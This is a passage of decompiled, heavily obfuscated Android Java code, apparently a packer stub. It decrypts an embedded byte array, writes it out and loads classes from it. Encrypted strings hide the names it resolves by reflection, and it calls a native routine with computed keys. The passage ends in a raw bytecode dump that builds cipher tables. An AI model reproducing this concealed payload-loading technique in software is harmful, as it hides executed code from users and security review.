  1027.         arrayOfByte[k] = ((byte)(i33 >> 8));
  1028.         k = i34 + 1;
  1029.         arrayOfByte[i34] = ((byte)i33);
  1030.         j++;
  1031.       }
  1032.       int m = i - arrayOfChar[0];
  1033.       Class localClass1 = Class.forName(attachBaseContext("쐦᮰↏鄾绑ꃰ琨텹膣付&#55426;连"));
  1034.       Constructor localConstructor = localClass1.getConstructor(new Class[] { localClass1, String.class });
  1035.       Class localClass2 = Class.forName(attachBaseContext("쐭ᮿ↝鄭纐ꃰ琣텹膆仞&#55424;迏╫䁩૥鉶˂ꇞႹ㕄禗泬࿥"));
  1036.       String str1 = attachBaseContext("쐫᮴↍鄛纖ꃫ");
  1037.       Class[] arrayOfClass1 = new Class[2];
  1038.       arrayOfClass1[0] = String.class;
  1039.       arrayOfClass1[1] = Integer.TYPE;
  1040.       Method localMethod1 = localClass2.getMethod(str1, arrayOfClass1);
  1041.       Object[] arrayOfObject1 = new Object[2];
  1042.       arrayOfObject1[0] = attachBaseContext("쐨᮴ↁ");
  1043.       arrayOfObject1[1] = Integer.valueOf(0);
  1044.       Object localObject1 = localMethod1.invoke(this, arrayOfObject1);
  1045.       Object[] arrayOfObject2 = new Object[2];
  1046.       arrayOfObject2[0] = attachBaseContext("쐣ᮤ↍鄻纚ꃡ");
  1047.       arrayOfObject2[1] = Integer.valueOf(0);
  1048.       Object localObject2 = localMethod1.invoke(this, arrayOfObject2);
  1049.       Object[] arrayOfObject3 = new Object[2];
  1050.       arrayOfObject3[0] = localObject1;
  1051.       arrayOfObject3[1] = attachBaseContext("쐢᮴↎酱纞ꃩ琬");
  1052.       Object localObject3 = localConstructor.newInstance(arrayOfObject3);
  1053.       Object[] arrayOfObject4 = new Object[2];
  1054.       arrayOfObject4[0] = localObject2;
  1055.       arrayOfObject4[1] = attachBaseContext("쐢᮴↎酱纐ꃽ琢턯");
  1056.       Object localObject4 = localConstructor.newInstance(arrayOfObject4);
  1057.       Class localClass3 = Class.forName(attachBaseContext("쐦᮰↏鄾绑ꃰ琨텹膣付&#55426;连╁䁲૥瀞˴ꇅႄ㕄禀泱࿰鹚"));
  1058.       Object localObject5 = localClass3.getConstructor(new Class[] { localClass1 }).newInstance(new Object[] { localObject3 });
  1059.       try
  1060.       {
  1061.         String str2 = attachBaseContext("쐻ᮣ←鄫纚");
  1062.         Class[] arrayOfClass2 = new Class[3];
  1063.         arrayOfClass2[0] = [B.class;
  1064.         arrayOfClass2[1] = Integer.TYPE;
  1065.         arrayOfClass2[2] = Integer.TYPE;
  1066.         Method localMethod2 = localClass3.getMethod(str2, arrayOfClass2);
  1067.         Object[] arrayOfObject5 = new Object[3];
  1068.         arrayOfObject5[0] = arrayOfByte;
  1069.         arrayOfObject5[1] = Integer.valueOf(0);
  1070.         arrayOfObject5[2] = Integer.valueOf(m);
  1071.         localMethod2.invoke(localObject5, arrayOfObject5);
  1072.         localClass3.getMethod(attachBaseContext("쐯ᮽ↖鄬纚"), new Class[0]).invoke(localObject5, new Object[0]);
  1073.         Method localMethod3 = localClass1.getMethod(attachBaseContext("쐫᮴↍鄜纞ꃷ琨턹膌仒&#55439;迗╞䁦૥廙"), new Class[0]);
  1074.         Class localClass4 = Class.forName(attachBaseContext("쐨᮰↕鄩纖ꃲ瑩턤膜仂&#55450;连╣䀩૕搜˹ꇷႾ㕜禗"));
  1075.         Class localClass5 = Class.forName(attachBaseContext("쐦᮰↏鄾绑ꃵ琦턹膂亟&#55485;迏╼䁮૿戴"));
  1076.         String str3 = attachBaseContext("쐠ᮾ↘鄻纻ꃼ琿");
  1077.         Class[] arrayOfClass3 = new Class[3];
  1078.         arrayOfClass3[0] = localClass5;
  1079.         arrayOfClass3[1] = localClass5;
  1080.         arrayOfClass3[2] = Integer.TYPE;
  1081.         Method localMethod4 = localClass4.getMethod(str3, arrayOfClass3);
  1082.         Object[] arrayOfObject6 = new Object[3];
  1083.         arrayOfObject6[0] = localMethod3.invoke(localObject3, new Object[0]);
  1084.         arrayOfObject6[1] = localMethod3.invoke(localObject4, new Object[0]);
  1085.         arrayOfObject6[2] = Integer.valueOf(0);
  1086.         Object localObject7 = localMethod4.invoke(null, arrayOfObject6);
  1087.         Method localMethod5 = localClass1.getMethod(attachBaseContext("쐨᮴↕鄺纋ꃼ"), new Class[0]);
  1088.         localMethod5.invoke(localObject3, new Object[0]);
  1089.         localMethod5.invoke(localObject4, new Object[0]);
  1090.         String str4 = attachBaseContext("쐠ᮾ↘鄻纼ꃵ琦턤膖");
  1091.         Class[] arrayOfClass4 = new Class[2];
  1092.         arrayOfClass4[0] = String.class;
  1093.         arrayOfClass4[1] = Class.forName(attachBaseContext("쐦᮰↏鄾绑ꃵ琦턹膂亟&#55469;迗╯䁴ૢ盛ˮꇐႳ㕕禀"));
  1094.         Method localMethod6 = localClass4.getMethod(str4, arrayOfClass4);
  1095.         Object[] arrayOfObject7 = new Object[2];
  1096.         arrayOfObject7[0] = attachBaseContext("쐯ᮾ↔酰纈ꃯ琾턳膜他&#55489;迁╼䁯૨滛ˣꇄჸ㕱禂泤࿽鹞ꏍ㈎&#56170;Ꙓㅱ蕝ﱿꝒ钼핿鲔兘㊮ᶚ&#56741;麟鸝웆갅삜쀥흯둾");
  1097.         arrayOfObject7[1] = Class.forName(attachBaseContext("쐦᮰↏鄾绑ꃵ琦턹膂亟&#55469;迗╯䁴ૢ")).getMethod(attachBaseContext("쐫᮴↍鄜纓ꃸ琴턤膩仞&#55439;迟╫䁵"), null).invoke(getClass(), null);
  1098.         ((Class)localMethod6.invoke(localObject7, arrayOfObject7)).getDeclaredMethod(attachBaseContext("쐹ᮿ↉鄾纜ꃲ"), new Class[] { localClass2, localClass1, localClass1 }).invoke(this, new Object[] { this, localObject3, localObject4 });
  1099.         Object localObject8 = Class.forName(attachBaseContext("쐦᮰↏鄾绑ꃵ琦턹膂亟&#55469;迗╯䁴ૢ")).getMethod(attachBaseContext("쐫᮴↍鄜纓ꃸ琴턤膩仞&#55439;迟╫䁵"), null).invoke(getClass(), null);
  1100.         Object[] arrayOfObject8 = new Object[2];
  1101.         arrayOfObject8[0] = attachBaseContext("쐯ᮾ↔酱纛ꃼ琿턧膗仞&#55450;连╭䁳૾滋ʯꇙႶ");
  1102.         arrayOfObject8[1] = localObject8;
  1103.         Class localClass6 = (Class)localMethod6.invoke(localObject7, arrayOfObject8);
  1104.         Class localClass7 = Class.forName(attachBaseContext("쐗ᮘ")).getComponentType();
  1105.         String str5 = attachBaseContext("쐥ᮿ←鄫纫ꃻ琫");
  1106.         Class[] arrayOfClass5 = new Class[9];
  1107.         arrayOfClass5[0] = Class.forName(attachBaseContext("쐦᮰↏鄾绑ꃵ琦턹膂亟&#55457;这╤䁢૲犯"));
  1108.         arrayOfClass5[1] = localClass7;
  1109.         arrayOfClass5[2] = localClass7;
  1110.         arrayOfClass5[3] = localClass7;
  1111.         arrayOfClass5[4] = localClass7;
  1112.         arrayOfClass5[5] = localClass7;
  1113.         arrayOfClass5[6] = localClass7;
  1114.         arrayOfClass5[7] = localClass7;
  1115.         arrayOfClass5[8] = localClass7;
  1116.         Method localMethod7 = localClass6.getDeclaredMethod(str5, arrayOfClass5);
  1117.         int n = -8600 + (0x715D9650 ^ Integer.parseInt(attachBaseContext("쑡ᯠ⇈酭绌ꂫ瑰텥臜亀&#55516;")));
  1118.         int i1 = 9070 + (0x12D49856 ^ (n >>> 27 | n << 5));
  1119.         int i2 = 9801 + (0x4CFE3EE6 ^ (i1 << 5 | i1 >>> 27));
  1120.         int i3 = 0xF653AF29 ^ (0xF5ABD652 ^ (i2 << 30 | i2 >>> 2)) - 39593;
  1121.         int i4 = 46356 + (0x1063762E ^ Integer.parseInt(attachBaseContext("쑽ᯧ⇁酯绋ꂩ瑷텣臓了")));
  1122.         int i5 = -7741 + (0x3834EAD0 ^ (i4 >>> 2 | i4 << 30));
  1123.         int i6 = 47251 + (0x507969D4 ^ (i5 << 2 | i5 >>> 30));
  1124.         int i7 = 0xA516ACB4 ^ 1121 + (0xF1D34EFB ^ (i6 >>> 11 | i6 << 21));
  1125.         int i8 = 47749 + (0xBAE0EE16 ^ Integer.parseInt(attachBaseContext("쑡ᯠ⇌酯终ꂩ瑳텧臗亅&#55514;")));
  1126.         int i9 = 63454 + (0x8F990DFF ^ (i8 >>> 14 | i8 << 18));
  1127.         int i10 = 9330 + (0x45A8DD17 ^ (i9 << 30 | i9 >>> 2));
  1128.         int i11 = 0x3A78FC29 ^ 27665 + (0x70699586 ^ (i10 >>> 15 | i10 << 17));
  1129.         int i12 = (0xF46B78A4 ^ Integer.parseInt(attachBaseContext("쑽ᯩ⇌酨织ꂩ瑲텢臐亇"))) - 64721;
  1130.         int i13 = 41035 + (0x6A0C52BF ^ (i12 << 1 | i12 >>> 31));
  1131.         int i14 = 1747 + (0x26608213 ^ (i13 >>> 1 | i13 << 31));
  1132.         int i15 = 0xD0C9A358 ^ (0x849CF05D ^ (i14 << 5 | i14 >>> 27)) - 42584;
  1133.         int i16 = 44168 + (0xE91A2B9F ^ Integer.parseInt(attachBaseContext("쑹ᯩ⇈酮绌ꂩ瑱텤臓")));
  1134.         int i17 = (0x2A45031E ^ (i16 << 28 | i16 >>> 4)) - 55795;
  1135.         int i18 = 56871 + (0xFAA348D ^ (i17 >>> 21 | i17 << 11));
  1136.         int i19 = 0x8199C7D5 ^ (0x4032D864 ^ (i18 >>> 20 | i18 << 12)) - 62620;
  1137.         int i20 = 61851 + (0xFFA888F0 ^ Integer.parseInt(attachBaseContext("쑡ᯠ⇌酮终ꂩ瑲텦臜予&#55510;")));
  1138.         int i21 = -14975 + (0x64BB5D60 ^ (i20 << 6 | i20 >>> 26));
  1139.         int i22 = -7696 + (0xA2ECDA73 ^ (i21 << 16 | i21 >>> 16));
  1140.         int i23 = 0xB9ACFCDF ^ -7658 + (0x3EDFEC88 ^ (i22 >>> 24 | i22 << 8));
  1141.         int i24 = 62652 + (0xCEEA9C01 ^ Integer.parseInt(attachBaseContext("쑵ᯤ⇍酮绎ꂫ瑶텠")));
  1142.         int i25 = 21849 + (0xC6C95995 ^ (i24 << 15 | i24 >>> 17));
  1143.         int i26 = 39521 + (0x7DABB4CE ^ (i25 >>> 12 | i25 << 20));
  1144.         int i27 = 0xBF234D24 ^ 60451 + (0x4E0EB04B ^ (i26 << 17 | i26 >>> 15));
  1145.         int i28 = 42384 + (0x24BA0B6D ^ Integer.parseInt(attachBaseContext("쑾ᯡ⇍酩终ꂨ瑷텥臑亀")));
  1146.         int i29 = 26558 + (0xF746F2EA ^ (i28 << 2 | i28 >>> 30));
  1147.         int i30 = 56435 + (0xFEF99A25 ^ (i29 << 13 | i29 >>> 19));
  1148.         int i31 = 0x736A4240 ^ 47881 + (0x69D3D017 ^ (i30 >>> 27 | i30 << 5));
  1149.         Object[] arrayOfObject9 = new Object[9];
  1150.         arrayOfObject9[0] = this;
  1151.         arrayOfObject9[1] = Integer.valueOf(i3);
  1152.         arrayOfObject9[2] = Integer.valueOf(i7);
  1153.         arrayOfObject9[3] = Integer.valueOf(i11);
  1154.         arrayOfObject9[4] = Integer.valueOf(i15);
  1155.         arrayOfObject9[5] = Integer.valueOf(i19);
  1156.         arrayOfObject9[6] = Integer.valueOf(i23);
  1157.         arrayOfObject9[7] = Integer.valueOf(i27);
  1158.         arrayOfObject9[8] = Integer.valueOf(i31);
  1159.         int i32 = ((Integer)localMethod7.invoke(null, arrayOfObject9)).intValue();
  1160.         if (i32 != 0)
  1161.           throw new UnsatisfiedLinkError(attachBaseContext("쐈ᮁ⇃酿") + i32);
  1162.       }
  1163.       finally
  1164.       {
  1165.         localClass3.getMethod(attachBaseContext("쐯ᮽ↖鄬纚"), new Class[0]).invoke(localObject5, new Object[0]);
  1166.       }
  1167.       dabcg = true;
  1168.     }
  1169.   }
  1170.  
  1171.   // ERROR //
  1172.   private static final void doInBackground()
  1173.   {
  1174.     // Byte code:
  1175.     //   0: sipush 256
  1176.     //   3: newarray int
  1177.     //   5: astore_0
  1178.     //   6: sipush 256
  1179.     //   9: newarray byte
  1180.     //   11: astore_1
  1181.     //   12: sipush 256
  1182.     //   15: newarray int
  1183.     //   17: astore_2
  1184.     //   18: sipush 256
  1185.     //   21: newarray int
  1186.     //   23: astore_3
  1187.     //   24: sipush 256
  1188.     //   27: newarray int
  1189.     //   29: astore 4
  1190.     //   31: sipush 256
  1191.     //   34: newarray int
  1192.     //   36: astore 5
  1193.     //   38: bipush 30
  1194.     //   40: newarray int
  1195.     //   42: astore 6
  1196.     //   44: iconst_0
  1197.     //   45: istore 7
  1198.     //   47: iconst_1
  1199.     //   48: istore 8
  1200.     //   50: iload 7
  1201.     //   52: sipush 256
  1202.     //   55: if_icmpge +34 -> 89
  1203.     //   58: aload_0
  1204.     //   59: iload 7
  1205.     //   61: iload 8
  1206.     //   63: iastore
  1207.     //   64: iload 8
  1208.     //   66: iload 8
  1209.     //   68: iconst_1
  1210.     //   69: ishl
  1211.     //   70: sipush 283
  1212.     //   73: iload 8
  1213.     //   75: bipush 7
  1214.     //   77: iushr
  1215.     //   78: imul
  1216.     //   79: ixor
  1217.     //   80: ixor
  1218.     //   81: istore 8
  1219.     //   83: iinc 7 1
  1220.     //   86: goto -36 -> 50
  1221.     //   89: aload_1
  1222.     //   90: iconst_0
  1223.     //   91: bipush 99
  1224.     //   93: bastore
  1225.     //   94: iconst_0
  1226.     //   95: istore 9
  1227.     //   97: iload 9
  1228.     //   99: ifne +234 -> 333
  1229.     //   102: iconst_0
  1230.     //   103: istore 39
  1231.     //   105: iload 39
  1232.     //   107: sipush 255
  1233.     //   110: if_icmpge +6567 -> 6677
  1234.     //   113: sipush 255
  1235.     //   116: iload 39
  1236.     //   118: isub
  1237.     //   119: istore 47
  1238.     //   121: aload_0
  1239.     //   122: iload 47
  1240.     //   124: iaload
  1241.     //   125: istore 48
  1242.     //   127: iload 48
  1243.     //   129: iload 48
  1244.     //   131: bipush 8
  1245.     //   133: ishl
  1246.     //   134: ior
  1247.     //   135: istore 49
  1248.     //   137: aload_1
  1249.     //   138: aload_0
  1250.     //   139: iload 39
  1251.     //   141: iaload
  1252.     //   142: bipush 99
  1253.     //   144: iload 49
  1254.     //   146: iload 49
  1255.     //   148: iconst_4
  1256.     //   149: ishr
  1257.     //   150: iload 49
  1258.     //   152: iconst_5
  1259.     //   153: ishr
  1260.     //   154: ixor
  1261.     //   155: iload 49
  1262.     //   157: bipush 6
  1263.     //   159: ishr
  1264.     //   160: ixor
  1265.     //   161: iload 49
  1266.     //   163: bipush 7
  1267.     //   165: ishr
  1268.     //   166: ixor
  1269.     //   167: ixor
  1270.     //   168: ixor
  1271.     //   169: i2b
  1272.     //   170: bastore
  1273.     //   171: iinc 39 1
  1274.     //   174: goto -69 -> 105
  1275.     //   177: iload 40
  1276.     //   179: sipush 256
  1277.     //   182: if_icmpge +6501 -> 6683
  1278.     //   185: sipush 255
  1279.     //   188: aload_1
  1280.     //   189: iload 40
  1281.     //   191: baload
  1282.     //   192: iand
  1283.     //   193: istore 44
  1284.     //   195: iload 44
  1285.     //   197: iconst_1
  1286.     //   198: ishl
  1287.     //   199: sipush 283
  1288.     //   202: iload 44
  1289.     //   204: bipush 7
  1290.     //   206: iushr
  1291.     //   207: imul
  1292.     //   208: ixor
  1293.     //   209: istore 45
  1294.     //   211: iconst_m1
  1295.     //   212: iload 45
  1296.     //   214: iload 44
  1297.     //   216: iload 45
  1298.     //   218: ixor
  1299.     //   219: bipush 24
  1300.     //   221: ishl
  1301.     //   222: iload 44
  1302.     //   224: bipush 16
  1303.     //   226: ishl
  1304.     //   227: ixor
  1305.     //   228: iload 44
  1306.     //   230: bipush 8
  1307.     //   232: ishl
  1308.     //   233: ixor
  1309.     //   234: ixor
  1310.     //   235: iand
  1311.     //   236: istore 46
  1312.     //   238: aload_2
  1313.     //   239: iload 40
  1314.     //   241: iload 46
  1315.     //   243: iastore
  1316.     //   244: aload_3
  1317.     //   245: iload 40
  1318.     //   247: iload 46
  1319.     //   249: bipush 8
  1320.     //   251: ishl
  1321.     //   252: iload 46
  1322.     //   254: bipush 248
  1323.     //   256: iushr
  1324.     //   257: ior
  1325.     //   258: iastore
  1326.     //   259: aload 4
  1327.     //   261: iload 40
  1328.     //   263: iload 46
  1329.     //   265: bipush 16
  1330.     //   267: ishl
  1331.     //   268: iload 46
  1332.     //   270: bipush 240
  1333.     //   272: iushr
  1334.     //   273: ior
  1335.     //   274: iastore
  1336.     //   275: aload 5
  1337.     //   277: iload 40
  1338.     //   279: iload 46
  1339.     //   281: bipush 24
  1340.     //   283: ishl
  1341.     //   284: iload 46
  1342.     //   286: bipush 232
  1343.     //   288: iushr
  1344.     //   289: ior
  1345.     //   290: iastore
  1346.     //   291: iinc 40 1
  1347.     //   294: goto -117 -> 177
  1348.     //   297: iload 43
  1349.     //   299: bipush 30
  1350.     //   301: if_icmpge +32 -> 333
  1351.     //   304: aload 6
  1352.     //   306: iload 43
  1353.     //   308: iload 42
  1354.     //   310: iastore
  1355.     //   311: iload 42
  1356.     //   313: iconst_1
  1357.     //   314: ishl
  1358.     //   315: sipush 283
  1359.     //   318: iload 42
  1360.     //   320: bipush 7
  1361.     //   322: iushr
  1362.     //   323: imul
  1363.     //   324: ixor
  1364.     //   325: istore 42
  1365.     //   327: iinc 43 1
  1366.     //   330: goto -33 -> 297
  1367.     //   333: bipush 16
  1368.     //   335: newarray byte
  1369.     //   337: astore 10
  1370.     //   339: sipush 256
  1371.     //   342: newarray byte
  1372.     //   344: dup
  1373.     //   345: iconst_0
  1374.     //   346: ldc_w 256
  1375.     //   349: bastore
  1376.     //   350: dup
  1377.     //   351: iconst_1
  1378.     //   352: ldc_w 257
  1379.     //   355: bastore
  1380.     //   356: dup
  1381.     //   357: iconst_2
  1382.     //   358: ldc_w 258
  1383.     //   361: bastore
  1384.     //   362: dup
  1385.     //   363: iconst_3
  1386.     //   364: ldc_w 259
  1387.     //   367: bastore
  1388.     //   368: dup
  1389.     //   369: iconst_4
  1390.     //   370: ldc_w 260
  1391.     //   373: bastore
  1392.     //   374: dup
  1393.     //   375: iconst_5
  1394.     //   376: ldc_w 261
  1395.     //   379: bastore
  1396.     //   380: dup
  1397.     //   381: bipush 6
  1398.     //   383: ldc_w 262
  1399.     //   386: bastore
  1400.     //   387: dup
  1401.     //   388: bipush 7
  1402.     //   390: ldc_w 263
  1403.     //   393: bastore
  1404.     //   394: dup
  1405.     //   395: bipush 8
  1406.     //   397: ldc_w 264
  1407.     //   400: bastore
  1408.     //   401: dup
  1409.     //   402: bipush 9
  1410.     //   404: ldc_w 265
  1411.     //   407: bastore
  1412.     //   408: dup
  1413.     //   409: bipush 10
  1414.     //   411: ldc_w 266
  1415.     //   414: bastore
  1416.     //   415: dup
  1417.     //   416: bipush 11
  1418.     //   418: ldc_w 267
  1419.     //   421: bastore
  1420.     //   422: dup
  1421.     //   423: bipush 12
  1422.     //   425: ldc_w 268
  1423.     //   428: bastore
  1424.     //   429: dup
  1425.     //   430: bipush 13
  1426.     //   432: ldc_w 269
  1427.     //   435: bastore
  1428.     //   436: dup
  1429.     //   437: bipush 14
  1430.     //   439: ldc_w 270
  1431.     //   442: bastore
  1432.     //   443: dup
  1433.     //   444: bipush 15
  1434.     //   446: ldc_w 271
  1435.     //   449: bastore
  1436.     //   450: dup
  1437.     //   451: bipush 16
  1438.     //   453: ldc_w 272
  1439.     //   456: bastore
  1440.     //   457: dup
  1441.     //   458: bipush 17
  1442.     //   460: ldc_w 273
  1443.     //   463: bastore
  1444.     //   464: dup
  1445.     //   465: bipush 18
  1446.     //   467: ldc_w 274
  1447.     //   470: bastore
  1448.     //   471: dup
  1449.     //   472: bipush 19
  1450.     //   474: ldc_w 275
  1451.     //   477: bastore
  1452.     //   478: dup
  1453.     //   479: bipush 20
  1454.     //   481: ldc_w 271
  1455.     //   484: bastore
  1456.     //   485: dup
  1457.     //   486: bipush 21
  1458.     //   488: ldc_w 276
  1459.     //   491: bastore
  1460.     //   492: dup
  1461.     //   493: bipush 22
  1462.     //   495: ldc_w 265
  1463.     //   498: bastore
  1464.     //   499: dup
  1465.     //   500: bipush 23
  1466.     //   502: ldc_w 277
  1467.     //   505: bastore
  1468.     //   506: dup
  1469.     //   507: bipush 24
  1470.     //   509: ldc_w 274
  1471.     //   512: bastore
  1472.     //   513: dup
  1473.     //   514: bipush 25
  1474.     //   516: ldc_w 278
  1475.     //   519: bastore
  1476.     //   520: dup
  1477.     //   521: bipush 26
  1478.     //   523: ldc_w 279
  1479.     //   526: bastore
  1480.     //   527: dup
  1481.     //   528: bipush 27
  1482.     //   530: ldc_w 280
  1483.     //   533: bastore
  1484.     //   534: dup
  1485.     //   535: bipush 28
  1486.     //   537: ldc_w 281
  1487.     //   540: bastore
  1488.     //   541: dup
  1489.     //   542: bipush 29
  1490.     //   544: ldc_w 282
  1491.     //   547: bastore
  1492.     //   548: dup
  1493.     //   549: bipush 30
  1494.     //   551: ldc_w 283
  1495.     //   554: bastore
  1496.     //   555: dup
  1497.     //   556: bipush 31
  1498.     //   558: ldc_w 284
  1499.     //   561: bastore
  1500.     //   562: dup
  1501.     //   563: bipush 32
  1502.     //   565: ldc_w 285
  1503.     //   568: bastore
  1504.     //   569: dup
  1505.     //   570: bipush 33
  1506.     //   572: ldc_w 286
  1507.     //   575: bastore
  1508.     //   576: dup
  1509.     //   577: bipush 34
  1510.     //   579: ldc_w 287
  1511.     //   582: bastore
  1512.     //   583: dup
  1513.     //   584: bipush 35
  1514.     //   586: ldc_w 288
  1515.     //   589: bastore
  1516.     //   590: dup
  1517.     //   591: bipush 36
  1518.     //   593: ldc_w 289
  1519.     //   596: bastore
  1520.     //   597: dup
  1521.     //   598: bipush 37
  1522.     //   600: ldc_w 290
  1523.     //   603: bastore
  1524.     //   604: dup
  1525.     //   605: bipush 38
  1526.     //   607: ldc_w 291
  1527.     //   610: bastore
  1528.     //   611: dup
  1529.     //   612: bipush 39
  1530.     //   614: ldc_w 292
  1531.     //   617: bastore
  1532.     //   618: dup
  1533.     //   619: bipush 40
  1534.     //   621: ldc_w 293
  1535.     //   624: bastore
  1536.     //   625: dup
  1537.     //   626: bipush 41
  1538.     //   628: ldc_w 294
  1539.     //   631: bastore
  1540.     //   632: dup
  1541.     //   633: bipush 42
  1542.     //   635: ldc_w 295
  1543.     //   638: bastore
  1544.     //   639: dup
  1545.     //   640: bipush 43
  1546.     //   642: ldc_w 296
  1547.     //   645: bastore
  1548.     //   646: dup
  1549.     //   647: bipush 44
  1550.     //   649: ldc_w 297
  1551.     //   652: bastore
  1552.     //   653: dup
  1553.     //   654: bipush 45
  1554.     //   656: ldc_w 298
  1555.     //   659: bastore
  1556.     //   660: dup
  1557.     //   661: bipush 46
  1558.     //   663: ldc_w 299
  1559.     //   666: bastore
  1560.     //   667: dup
  1561.     //   668: bipush 47
  1562.     //   670: ldc_w 300
  1563.     //   673: bastore
  1564.     //   674: dup
  1565.     //   675: bipush 48
  1566.     //   677: ldc_w 301
  1567.     //   680: bastore
  1568.     //   681: dup
  1569.     //   682: bipush 49
  1570.     //   684: ldc_w 302
  1571.     //   687: bastore
  1572.     //   688: dup
  1573.     //   689: bipush 50
  1574.     //   691: ldc_w 278
  1575.     //   694: bastore
  1576.     //   695: dup
  1577.     //   696: bipush 51
  1578.     //   698: ldc_w 303
  1579.     //   701: bastore
  1580.     //   702: dup
  1581.     //   703: bipush 52
  1582.     //   705: ldc_w 304
  1583.     //   708: bastore
  1584.     //   709: dup
  1585.     //   710: bipush 53
  1586.     //   712: ldc_w 305
  1587.     //   715: bastore
  1588.     //   716: dup
  1589.     //   717: bipush 54
  1590.     //   719: ldc_w 306
  1591.     //   722: bastore
  1592.     //   723: dup
  1593.     //   724: bipush 55
  1594.     //   726: ldc_w 307
  1595.     //   729: bastore
  1596.     //   730: dup
  1597.     //   731: bipush 56
  1598.     //   733: ldc_w 308
  1599.     //   736: bastore
  1600.     //   737: dup
  1601.     //   738: bipush 57
  1602.     //   740: ldc_w 292
  1603.     //   743: bastore
  1604.     //   744: dup
  1605.     //   745: bipush 58
  1606.     //   747: ldc_w 309
  1607.     //   750: bastore
  1608.     //   751: dup
  1609.     //   752: bipush 59
  1610.     //   754: ldc_w 310
  1611.     //   757: bastore
  1612.     //   758: dup
  1613.     //   759: bipush 60
  1614.     //   761: ldc_w 311
  1615.     //   764: bastore
  1616.     //   765: dup
  1617.     //   766: bipush 61
  1618.     //   768: ldc_w 312
  1619.     //   771: bastore
  1620.     //   772: dup
  1621.     //   773: bipush 62
  1622.     //   775: ldc_w 313
  1623.     //   778: bastore
  1624.     //   779: dup
  1625.     //   780: bipush 63
  1626.     //   782: ldc_w 314
  1627.     //   785: bastore
  1628.     //   786: dup
  1629.     //   787: bipush 64
  1630.     //   789: ldc_w 315
  1631.     //   792: bastore
  1632.     //   793: dup
  1633.     //   794: bipush 65
  1634.     //   796: ldc_w 316
  1635.     //   799: bastore
  1636.     //   800: dup
  1637.     //   801: bipush 66
  1638.     //   803: ldc_w 317
  1639.     //   806: bastore
  1640.     //   807: dup
  1641.     //   808: bipush 67
  1642.     //   810: ldc_w 278
  1643.     //   813: bastore
  1644.     //   814: dup
  1645.     //   815: bipush 68
  1646.     //   817: ldc_w 318
  1647.     //   820: bastore
  1648.     //   821: dup
  1649.     //   822: bipush 69
  1650.     //   824: ldc_w 305
  1651.     //   827: bastore
  1652.     //   828: dup
  1653.     //   829: bipush 70
  1654.     //   831: ldc_w 319
  1655.     //   834: bastore
  1656.     //   835: dup
  1657.     //   836: bipush 71
  1658.     //   838: ldc_w 320
  1659.     //   841: bastore
  1660.     //   842: dup
  1661.     //   843: bipush 72
  1662.     //   845: ldc_w 321
  1663.     //   848: bastore
  1664.     //   849: dup
  1665.     //   850: bipush 73
  1666.     //   852: ldc_w 296
  1667.     //   855: bastore
  1668.     //   856: dup
  1669.     //   857: bipush 74
  1670.     //   859: ldc_w 322
  1671.     //   862: bastore
  1672.     //   863: dup
  1673.     //   864: bipush 75
  1674.     //   866: ldc_w 323
  1675.     //   869: bastore
  1676.     //   870: dup
  1677.     //   871: bipush 76
  1678.     //   873: ldc_w 324
  1679.     //   876: bastore
  1680.     //   877: dup
  1681.     //   878: bipush 77
  1682.     //   880: ldc_w 325
  1683.     //   883: bastore
  1684.     //   884: dup
  1685.     //   885: bipush 78
  1686.     //   887: ldc_w 326
  1687.     //   890: bastore
  1688.     //   891: dup
  1689.     //   892: bipush 79
  1690.     //   894: ldc_w 327
  1691.     //   897: bastore
  1692.     //   898: dup
  1693.     //   899: bipush 80
  1694.     //   901: ldc_w 328
  1695.     //   904: bastore
  1696.     //   905: dup
  1697.     //   906: bipush 81
  1698.     //   908: ldc_w 329
  1699.     //   911: bastore
  1700.     //   912: dup
  1701.     //   913: bipush 82
  1702.     //   915: ldc_w 325
  1703.     //   918: bastore
  1704.     //   919: dup
  1705.     //   920: bipush 83
  1706.     //   922: ldc_w 330
  1707.     //   925: bastore
  1708.     //   926: dup
  1709.     //   927: bipush 84
  1710.     //   929: ldc_w 285
  1711.     //   932: bastore
  1712.     //   933: dup
  1713.     //   934: bipush 85
  1714.     //   936: ldc_w 331
  1715.     //   939: bastore
  1716.     //   940: dup
  1717.     //   941: bipush 86
  1718.     //   943: ldc_w 307
  1719.     //   946: bastore
  1720.     //   947: dup
  1721.     //   948: bipush 87
  1722.     //   950: ldc_w 332
  1723.     //   953: bastore
  1724.     //   954: dup
  1725.     //   955: bipush 88
  1726.     //   957: ldc_w 331
  1727.     //   960: bastore
  1728.     //   961: dup
  1729.     //   962: bipush 89
  1730.     //   964: ldc_w 333
  1731.     //   967: bastore
  1732.     //   968: dup
  1733.     //   969: bipush 90
  1734.     //   971: ldc_w 334
  1735.     //   974: bastore
  1736.     //   975: dup
  1737.     //   976: bipush 91
  1738.     //   978: ldc_w 283
  1739.     //   981: bastore
  1740.     //   982: dup
  1741.     //   983: bipush 92
  1742.     //   985: ldc_w 335
  1743.     //   988: bastore
  1744.     //   989: dup
  1745.     //   990: bipush 93
  1746.     //   992: ldc_w 296
  1747.     //   995: bastore
  1748.     //   996: dup
  1749.     //   997: bipush 94
  1750.     //   999: ldc_w 336
  1751.     //   1002: bastore
  1752.     //   1003: dup
  1753.     //   1004: bipush 95
  1754.     //   1006: ldc_w 337
  1755.     //   1009: bastore
  1756.     //   1010: dup
  1757.     //   1011: bipush 96
  1758.     //   1013: ldc_w 338
  1759.     //   1016: bastore
  1760.     //   1017: dup
  1761.     //   1018: bipush 97
  1762.     //   1020: ldc_w 339
  1763.     //   1023: bastore
  1764.     //   1024: dup
  1765.     //   1025: bipush 98
  1766.     //   1027: ldc_w 282
  1767.     //   1030: bastore
  1768.     //   1031: dup
  1769.     //   1032: bipush 99
  1770.     //   1034: ldc_w 320
  1771.     //   1037: bastore
  1772.     //   1038: dup
  1773.     //   1039: bipush 100
  1774.     //   1041: ldc_w 329
  1775.     //   1044: bastore
  1776.     //   1045: dup
  1777.     //   1046: bipush 101
  1778.     //   1048: ldc_w 340
  1779.     //   1051: bastore
  1780.     //   1052: dup
  1781.     //   1053: bipush 102
  1782.     //   1055: ldc_w 341
  1783.     //   1058: bastore
  1784.     //   1059: dup
  1785.     //   1060: bipush 103
  1786.     //   1062: ldc_w 286
  1787.     //   1065: bastore
  1788.     //   1066: dup
  1789.     //   1067: bipush 104
  1790.     //   1069: ldc_w 314
  1791.     //   1072: bastore
  1792.     //   1073: dup
  1793.     //   1074: bipush 105
  1794.     //   1076: ldc_w 342
  1795.     //   1079: bastore
  1796.     //   1080: dup
  1797.     //   1081: bipush 106
  1798.     //   1083: ldc_w 343
  1799.     //   1086: bastore
  1800.     //   1087: dup
